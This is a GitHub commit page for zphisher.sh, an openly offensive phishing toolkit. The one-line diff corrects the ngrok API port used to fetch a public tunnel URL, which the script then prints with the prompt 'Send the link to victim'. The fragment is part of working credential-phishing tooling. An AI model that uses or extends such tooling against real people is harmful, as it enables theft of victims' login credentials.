Skip to content

Commit

Permalink
Update zphisher.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
htr-tech authored Dec 2, 2019
1 parent 75baf2b commit 7ea91da
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion zphisher.sh
Original file line number Diff line number Diff line change
Expand Up @@ -322,7 +322,7 @@ sleep 2
./ngrok http 5555 > /dev/null 2>&1 &
sleep 10

link=$(curl -s -N http://127.0.0.1:4041/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
printf "\n\e[96m[\e[0m\e[1;77m~\e[96m]\e[0m\e[1;96m Send the link to victim :\e[0m\e[1;93m %s \n" $link
found
}
Expand Down

0 comments on commit 7ea91da

Please sign in to comment.